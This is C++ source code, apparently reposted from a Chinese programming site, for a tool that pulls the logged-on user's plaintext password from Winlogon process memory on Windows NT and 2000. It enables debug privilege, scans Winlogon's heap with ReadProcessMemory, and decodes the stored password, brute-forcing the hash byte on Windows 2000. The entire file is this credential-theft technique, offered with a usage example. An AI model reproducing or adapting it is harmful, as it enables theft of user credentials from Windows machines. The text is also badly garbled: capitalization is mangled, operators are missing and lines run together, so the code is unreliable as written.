/ / Get the WinNT / Win2K current username and password, call the following function:
// Bool GetPassword (String & Strcurrdomain, String & Strcurrpwd)
/ / -------------------------------------------------------------------------------------------- ---------------------------
Typedef
Struct _unicode_string
{
Ushort Length;
Ushort maximumlength;
PWSTR BUFFER;
} Unicode_string, * punicode_string;
Typedef
Struct _Query_system_information
{
DWORD GRANTEDACCESS;
DWORD PID;
Word handletype;
Word HandleId;
DWORD HANDLE;
} Query_system_information, * pquery_system_information;
Typedef
Struct _process_info_header
{
DWORD count;
DWORD UNK04;
DWORD UNK08;
} Process_info_header, * pprocess_info_header;
Typedef
Struct _Process_info
{
DWORD loadAddress;
DWORD size;
DWORD UNK08;
DWORD Enumerator;
DWORD UNK10;
CHAR Name [0x108];
} Process_info, * pprocess_info;
Typedef
Struct _Encoded_Password_info
{
DWORD hashbyte;
DWORD UNK04;
DWORD UNK08;
DWORD UNK0C;
Filetime Loggedon;
DWORD UNK18;
DWORD UNK1C;
DWORD UNK20;
DWORD UNK24;
DWORD UNK28;
Unicode_string encodedpassword;
} Encode_password_info, * pencoded_password_info;
TYPEDEF DWORD
__stdcall * pfnntQuerySystemInformation) (DWORD, PVOID, DWORD, PDWORD);
Typedef pvoid
__stdcall * pfnrtlcreatequerydebugbuffer (dword, dword);
TYPEDEF DWORD
__stdcall * pfnrtlQueryProcessDebugInformation) (DWORD, DWORD, PVOID);
Typedef
Void
__stdcall * pfnrtldestroyQueryDebugBuffer (PVOID);
Typedef
Void
__stdcall * pfntslrundecodeunicodeString) (Byte, Punicode_String);
// private prototypes
Bool iswinnt
Void);
Bool iswin2k (
Void);
Bool Adddebugprivilege
Void);
DWORD FINDWINLOGON
Void);
Bool LocatePasswordPagewinnt (DWORD, PDWORD);
Bool LocatePasswordPageWin2k (DWORD, PDWORD);
Void ReturnWinntPwd (String &, String &, String &); Void Returnwin2kpwd (String &, String &, String &);
Bool GetPassword (String &, String &, String &);
// Global Variables
PfnntQuerySystemInformation PfnntQuerySystemInformation;
PfnrtlcreateQueryDebugBuffer PfnrtlcreateQueryDebugBuffer;
PfnrtlQueryProcessDebuginformation PfnrtlQueryProcessDebuginformation;
PfnrtldestroyQueryDebugBuffer PfnrtldestroyQueryDebugBuffer;
Pfntstring pfnrtlrundecodeunicate odestring;
DWORD dwpwdlen = 0;
Pvoid pvrealpwd = null;
PVOID PVPWD = NULL;
DWORD dwhashbyte = 0;
Wchar_t wszusername [0x400];
Wchar_t wszuserdomain [0x400];
/ / -------------------------------------------------------------------------------------------- ---------------------------
Bool getPassword (String & Strcurrdomain, String & Strcurruser, String & Strcurrpwd)
{
IF (! iswinnt () &&! iswin2k ())
{
// only suitable for 2000 or XP
Return
False;
}
// Add debug privilege to passwordreminder -
// this is needed for the search for Winlogon.
IF (! adddebugprivilege ())
{
/ / Can't add Debug privileges
Return
False;
}
// debug privilege has been successfully added to this program
Hinstance hntdll = loadingLibrary
NTDLL.DLL ");
PfnntQuerySystemInformation = (PFNNTQuerySystemInformation)
GetProcaddress (HNTDLL,
"Ntquerysysteminformation");
PfnrtlcreateQueryDebugBuffer = (PfnrtlcreateQueryDebugBuffer)
GetProcaddress (HNTDLL,
"RTLCREATEQUERYDEBUGBUGBUGFER");
PfnrtlQueryProcessDebuginformation = (PfnrtlQueryProcessDebuginformation)
GetProcaddress (HNTDLL,
"RTLQueryProcessDebuginformation");
PfnrtldestroyQueryDebugBuffer = (PfnrtLDestroyQueryDebugbuffer)
GetProcaddress (HNTDLL,
"RTLDESTROYQUERYDEBUGBUGBUGFER");
PfnrtlrundecodeunicodeString = (PfntslrundecodeunicodeString) GetProcaddress (HNTDLL,
"RTLRundecodeunicodeString");
// Locate Winlogon's PID - NEED Debug Privilege and admin Rights.
DWORD dwinlogonpid = findwinlogon ();
IF (! dwwinlogonpid)
{
/ / Can't find the process Winlogon or use nwgina.dll
/ / Causing a password that cannot be found in memory
Freelibrary (HNTDLL);
Return
False;
}
// Format ("The main process Winlogon ID is% d (0x% 8.8x) ./ n",
// arrayofconst ((int) dwwinlogonpid, (int) dwwinlogonpid))))))))))))
// set values to check memory block against.
MEMSET (WSZUSERNAME, 0,
SizeOf (WSZUSERNAME);
MEMSET (WSZUSERDOMAIN, 0,
SizeOf (WSZUSERDOMAIN);
Getenvironmentvariablew (L)
"UserName", WSZUSERNAME, 0X400);
Getenvironmentvariablew (L)
"UserDomain", WSZUSERDOMAIN, 0X400);
// locate the block of memory containing
// The Password in Winlogon's Memory Space.
Bool bfoundpasswordpage;
// bFoundpasswordPage = false;
IF (iswin2k ())
BFoundPasswordPage = locatePasswordPagewin2k (dwwinlogonpid, & dwpwdlen);
Else
BFoundPasswordPage = LocatePasswordPagewinnt (dwwinlogonpid, & dwpwdlen);
IF (bFoundpasswordpage)
{
IF (dwpwdlen == 0)
{
// Format ("Landing Information is: Domain Name:% S / Password:% S. / N",
// arrayofconst (wszuserdomain, wszusername)))))))))))
// The length of the password is empty, the system has no password
}
Else
{
// Format ("Found Password,% D / N", arrayofconst ((int) dwpwdlen))))))))
// Decode the password string.
IF (iswin2k ())
ReturnWin2kpwd (StrcurRdomain, Strcurruser, StrCurrpwd);
Else
ReturnWinntPwd (StrcurRdomain, Strcurruser, StrCurrpwd);
}
}
Else
{
Freelibrary (HNTDLL);
Return
False;
}
// No password in the middle of the memory
Return
True;
}
/ / -------------------------------------------------------------------------------------------- ---------------------------
Bool iswinnt
Void)
{
OsversionInfo OsversionInfo; OsversionInfo.dwosversionInfosize =
SizeOf (OsversionInfo);
IF (GetversionEx (& OsversionInfo))
Return (OsversionInfo.dwplatformID == Ver_Platform_WIN32_NT);
Else
Return (False);
}
/ / -------------------------------------------------------------------------------------------- ---------------------------
Bool iswin2k (
Void)
{
OsversionInfo OsversionInfo;
OsversionInfo.dwosversioninfosize =
SizeOf (OsversionInfo);
IF (GetversionEx (& OsversionInfo))
Return ((OsversionInfo.dwplatformID == Ver_Platform_Win32_NT)
&& (osversioninfo.dwmajorversion == 5));
Else
Return (False);
}
/ / -------------------------------------------------------------------------------------------- ---------------------------
Bool Adddebugprivilege
Void)
{
Handle token;
Token_privileges tokenprivileges, previousstate;
DWORD RETURNLENGTH = 0;
IF (GetProcessToken (GetCurrentProcess (), Token_Query | Token_adjust_privileges, & token)
IF (lookuppprivilerage (NULL,
"SedebugPrivilege", & tokenprivileges.privileges [0] .luid))
{
Tokenprivileges.privilegectount = 1;
Tokenprivileges.privileges [0] .attributes = se_privilege_enabled;
Return (AdjustTokenprivilegege "(Token, False, & Tokenprivileges,
SizeOf (Token_Privileges), & PreviousState, & ReturnLength);
}
Return (False);
}
/ / -------------------------------------------------------------------------------------------- ---------------------------
// This article is a code provided by a friend of CCRUN (old demon). Problem or suggestion Please contact us: info@ccrun.com
// Welcome to C Builder Study http://www.ccrun.com
/ / -------------------------------------------------------------------------------------------- ---------------------------
// Note That The Following Code Eliminates the NEED
// for psapi.dll as part of the executable.
DWORD FINDWINLOGON
Void)
{
#define initial_allocation 0x100
DWORD DWRC = 0;
DWORD dwsizeneeded = 0;
Pvoid Pvinfo = Heapalloc (getProcessheap (), Heap_Zero_Memory, Initial_Allocation
// Find how much memory is required.
PfnntQuerySystemInformation (0x10, pvinfo, initial_allocation, & dwsizeneed);
HeapFree (getProcessHeap (), 0, pvinfo;
// Now, Allocate The Proper Amount of Memory.
Pvinfo = Heapalloc (getProcessheap (), Heap_zero_memory, dwsizeneed;
DWORD dwsizewritten = dwsizeneed;
IF (PfnntQuerySystemInformation (0x10, Pvinfo, DWSIZIZIZENEDED, & DWSIZEWRITEN))
{
HeapFree (getProcessHeap (), 0, pvinfo;
Return (0);
}
DWORD dwnumhandles = dwsizewritten /
SIZEOF (Query_System_INFORMATION);
IF (dwnumhandles == 0)
{
HeapFree (getProcessHeap (), 0, pvinfo;
Return (0);
}
PQuery_system_information QuerySystemInformationP =
PVinfo; pvinfo;
Try
{
For (DWORD I = 1; i <= dwnumhandles; i )
{
// "5" is the value of a kernel object type process.
QuerySystemInformationP-> Handletype == 5)
{
Pvoid pvdebugbuffer = pfnrtlcreateQueryDebugBuffer (0, 0);
IF (PfnrtlQueryProcessDebuginformation)
(QuerySysteminformationP-> PID, 1, PVDebugBuffer) == 0)
{
PPRocess_info_header pihprocessinfoheader =
(Pprocess_info_header) (DWORD) PVDebugBuffer 0x60);
DWORD dwcount = pihprocessinfoheader-> count;
PPROCESS_INFO PIPROCESSINFO = (PPRocess_info)
(DWORD) PIHPROCESSINFOHEADER
SIZEOF (Process_Info_Header);
// Form1-> Memo1-> lines-> add (piprocessinfo-> name);
Ansistring strname = piprocessinfo-> name;
// IF (strstr ((char *) Upcase (* piprocessinfo-> name), "Winlogon")! = 0)
IF (strname.uppercase (). POS
"Winlogon")! = 0)
{
DWORD DWTEMP = (DWORD) PiprocessInfo; for (DWORD J = 0; J { DWTEMP = SIZEOF (Process_Info); PiprocessInfo = (pprocess_info) dwtemp; Strname = piprocessinfo-> name; IF (strname.uppercase (). POS "Nwgina")! = 0) Return (0); IF (strname.uppercase (). POS "Msgina")! = 0) DWRC = querysysteminformationp-> pid; } IF (PVDebugBuffer) PfnrtldestroyQueryDebugBuffer (PVDebugBuffer); HeapFree (getProcessHeap (), 0, pvinfo; Return (DWRC); } } IF (PVDebugBuffer) PfnrtldestroyQueryDebugBuffer (PVDebugBuffer); } DWORD DWTEMP = (DWORD) QuerySystemInformationP; DWTEMP = SIZEOF (Query_System_INFORMATION); QuerySystemInformationP = (pquery_system_information) dwtemp; } } Catch (...) {} HeapFree (getProcessHeap (), 0, pvinfo; Return (DWRC); } / / -------------------------------------------------------------------------------------------- --------------------------- Bool LocatePasswordPagewinnt (DWORD DWWINLOGONPID, PDWORD PDWPWPWDLEN) { #define user_domain_offset_winnt 0x200 #define user_password_offset_winnt 0x400 BOOL BRC = false; Handle hwinlogonhandle = OpenProcess (process_query_information | process_vm_read, False, dwwinlogonpid; IF (! hwinlogonhandle) Return (BRC); * pdwpwdlen = 0; System_info sisysteminfo; GetSystemInfo (& SISYSTEMINFO); DWORD DWPEB = 0x7ffdf000; DWORD DWBYTESCOPIED = 0; PVOID PVEBP = HeapAlloc (getProcessheap (), Heap_zero_memory, sisysteminfo.dwpagesize; IF (! ReadProcessMemory (Hwinlogonhandle, (PVOID) DWPEB, PVEBP, Sisysteminfo.dwageSize, & dwbytescopied)) { CloseHandle (HwinLogonhandle); Return (BRC); } // grab the value of the 2nd dword in the teb. PDWORD PDWINLOGONHEAP = (PDWORD) ((DWORD) PVEBP (6 * sizeof (dword))); Memory_basic_information mbimemorybasicinfor; IF (VirtualQueryex (HwinLogonhandle, (PVOID) * Pdwwinlogonheap, & mbimemorybasicinfor, SIZEOF (Memory_basic_information)))))))))))))))) IF ((MbimeMoryBasicinfor .State & Mem_Commit) == MEM_COMMIT) && ((MbimeMoryBasicinFor.Protect & Page_guard) == 0)) { Pvoid pvwinlogonmem = heapalloc (getProcessheap (), Heap_zero_memory, MbimeMoryBasicinFor.Regionsize); IF (Hwinlogonhandle, (PVOID) * pdwwinlogonheap, PvwinlogonMem, MbimeMoryBasicinFor.Regionsize, & dwbytescopied)) { DWORD I = (dword) pvwinlogonmem; DWORD dwusernamepos = 0; // The order in memory is wszusername backed by the wszuserdomain. DO { IF ((WSZUSERNAME) Wchar_t *) i) == 0) && (WCSCMP (WSZUSERDOMAIN, Wchar_t *) (i user_domain_offset_winnt)) == 0)) { dwusernamepos = i; Break; } i = 2; } While (i <(dword) pvwinlogonmem mbimemorybasicinfor.regionsize; IF (dwusernamepos) { Pencoded_password_info pepiencodedpwdinfo = (Pencoded_password_info) (DWORD) DWUSERNAMEPOS User_password_offset_winnt); Filetime ftlocalfiletime; SystemTime StsystemTime; IF (FileTimetolocalFiletime (& PepiencodedPwdInfo-> Loggedon, & ftlocalfiletime))) IF (FileTimetosystemTime (& FTLOCALFILETIME, & STSYSTEMTIME)) {} // Format ("Your login time is:% D /% D /% D% D:% D:% D / N", // arrayofconst ((stsystemtime.wmonth, stsystemtime.wday, // stsystemtime.wyear, stsystemtime.whour, // stsystemtime.wminute, stsystemtime.wsecond))))))))))))))))) * pdwpwdlen = (pepiencodedpwdinfo-> encodedpassword.length & 0x00FF) / Sizeof Wchar_t); DWHASHBYTE = (pepiencodedpwdinfo-> EncodedPassword.length & 0xff00) >> 8; PVRealPwd = (PVOID) (* Pdwwinlogonheap (dwusernamepos - (DWORD) PVWINLOGONMEM) User_password_offset_winnt 0x34); PVPWD = (PVOID) (PBYTE) (dwusernamepos User_password_offset_winnt 0x34))); BRC = true; } } } HeapFree (getProcessHeap (), 0, PVEBP); CloseHandle (HwinLogonhandle); Return (BRC); } / / -------------------------------------------------------------------------------------------- --------------------------- Bool LocatePasswordPageWin2k (DWORD DWWINLOGONPID, PDWORD PDWPWPWDLEN) { #define user_domain_offset_win2k 0x400 #define user_password_offset_win2k 0x800 Handle HwinlogonHandle = OpenProcess (Process_Query_Information | Process_vm_read, false, dwwinlogonpid; IF (hwinlogonhandle == 0) Return (False); * pdwpwdlen = 0; System_info sisysteminfo; GetSystemInfo (& SISYSTEMINFO); DWORD I = (dword) sisysteminfo.lpminimumApplicationAddress; DWORD dwmaxmemory = (dword) sisysteminfo.lpmaximumApplicationAddress; DWORD dwincrement = sisysteminfo.dwagesize; Memory_basic_information mbimemorybasicinfor; While (i { IF (VirtualQueryex (Hwinlogonhandle, (PVOID) I, & MbimeMoryBasicinfor, SIZEOF (Memory_basic_information)))))))))))))))) { Dwincrement = mbimemorybasicinfor.regionsize; IF ((MbimeMoryBasicinfor .State & Mem_Commit) == MEM_COMMIT) && ((MbimeMoryBasicinFor.Protect & Page_guard) == 0)) { Pvoid pvrealstartingaddress = Heapalloc (getProcessHeap (), Heap_zero_memory, mbimemorybasicinfor.regionsize; DWORD DWBYTESCOPIED = 0; IF (Hwinlogonhandle, (PVOID) i, PVRealStartingAddress, MbimemoryBasicinFor.Regionsize, & dwbytescopied) { IF ((WCSCMP) Wchar_t *) pvrealStartingAddress, WSZUSERNAME) == 0) && (WCSCMP) Wchar_t *) (DWORD) PVREALSTARTINGADDRESS User_domain_offset_win2k), WSZUSERDOMAIN) == 0)) { PVRealPwd = (pvoid) (i user_password_offset_win2k); PVPWD = (PVOID) (DWORD) PVREALSTARTINGDRESS User_password_offset_win2k); // Calculate The Length of Encoded Unicode String. PBYTE PBTEMP = (pbyte) pvpwd; DWORD dwloc = (dword) pbtemp; DWORD DWLEN = 0; IF ((* PbTemp == 0) && (* (pbyte) (DWORD) PBTEMP 1) == 0)) {} Else DO { DWLEN ; DWLOC = 2; PBTEMP = (pbyte) dwloc; } While (* pbTemp! = 0); * pdwpwdlen = dwlen; CloseHandle (HwinLogonhandle); Return (TRUE); } } HeapFree (getProcessHeap (), 0, PVREALSTARTINGDRESS; } } Else Dwincrement = sisysteminfo.dwpagesize; // Move to Next Memory Block. i = dwincrement; } CloseHandle (HwinLogonhandle); Return (False); } / / -------------------------------------------------------------------------------------------- --------------------------- Void ReturnwinntPwd (String & Strcurrdomain, String & Strcurrpwd) { Unicode_string uSencodedString; UsencodedString.Length = (Word) dwpwdlen * Sizeof Wchar_t); UsencodedString.maximumLength = (Word) DWPWDLEN * Sizeof Wchar_t)) Sizeof Wchar_t); Usencodedstring.buffer = (pwstr) Heapalloc (getProcessHeap (), HEAP_ZERO_MEMORY, UsencodedString.MaxImumlength; CopyMemory (usecodedstring.buffer, pvpwd, dwpwdlen * Sizeof Wchar_t)); // finally - decode the password. // Note That Only One Call Is Required Since The Hash-Byte // Was Part of the Orginally Encode String.pfnrtlrundecodeUnicodestring (Byte) DWHASHBYTE, & UsencodedString; Strcurrdomain = string (wszuserdomain); Strincurruser = string (wszusername); Strcurrpwd = Ansistring (usencodedstring.buffer); // Format ("Your login information is a domain name:% s username:% s password:% s / n", // arrayofconst (wszuserdomain, wszusername, usncodedstring.buffer))))))))))))) // Format ("THE HASH BYTE IS: 0x% 2.2x. / N", ArrayOfconst ((int) dwhashbyte)))))))))) HeapFree (getProcessHeap (), 0, useencodedstring.buffer; } / / -------------------------------------------------------------------------------------------- --------------------------- Void ReturnWin2kpwd (String & Strcurrdomain, String & Strcurrpwd) { // DWORD dwhash = 0; Unicode_string uSencodedString; UsencodedString.Length = (Ushort) dwpwdlen * Sizeof Wchar_t); UsencodedString.maximumLength = (USHORT) DWPWDLEN * Sizeof Wchar_t)) Sizeof Wchar_t); Usencodedstring.buffer = (pwstr) Heapalloc (getProcessHeap (), HEAP_ZERO_MEMORY, UsencodedString.MaxImumlength; // this is a brute force technique since the hash-byte // is not stored as part of the Encode string -:> (. For (DWORD I = 0; i <= 0xff; i ) { CopyMemory (usecodedstring.buffer, pvpwd, dwpwdlen * Sizeof Wchar_t)); // finally - try to decode the password. PfnrtlrundecodeunicodeString (Byte) I, & UseNCodedString; // Check for a viewable password. PBYTE PBTEMP = (Pbyte) UsencodedString.Buffer; Bool bview = true; DWORD J, K; For (j = 0; (j { IF ((* pbtemp) && (* (pbyte) (DWORD (PBTEMP) 1) == 0)) { IF (* PbTemp <0x20) BVIEWABLE = FALSE; IF (* PbTemp> 0x7e) BVIEWABLE = FALSE; } Else BVIEWABLE = FALSE; K = DWORD (PBTEMP); K = 2; Pbtemp = (pbyte) k; } IF (BViewable) { Strcurrdomain = string (wszuserdomain); Strincurruser = string (wszusername); Strcurrpwd = string (usecodedstring.buffer); // Format ("Your landing information is: Domain Name:% s User Name:% s Password:% S / N", // arrayofconst (wszuserdomain, wszusername, usncodedstring.buffer))))))))))))) // Format ("The Hash Byte IS: 0x% 2.2x. / N", ArrayOfconst ((int) i)))))))))))) } } HeapFree (getProcessHeap (), 0, useencodedstring.buffer; } / / -------------------------------------------------------------------------------------------- --------------------------- // call example Void __fastcall tform1 :: Button1click (TOBJECT * Sender) { String strcurdomain, strcurruser, strcurrpwd; GetPassword (StrcurRdomain, Strcurruser, StrCurrpwd); Memo1-> lines-> add (strcurrdomain); Memo1-> Lines-> Add (strcurruser); Memo1-> Lines-> Add (strcurrpwd); }
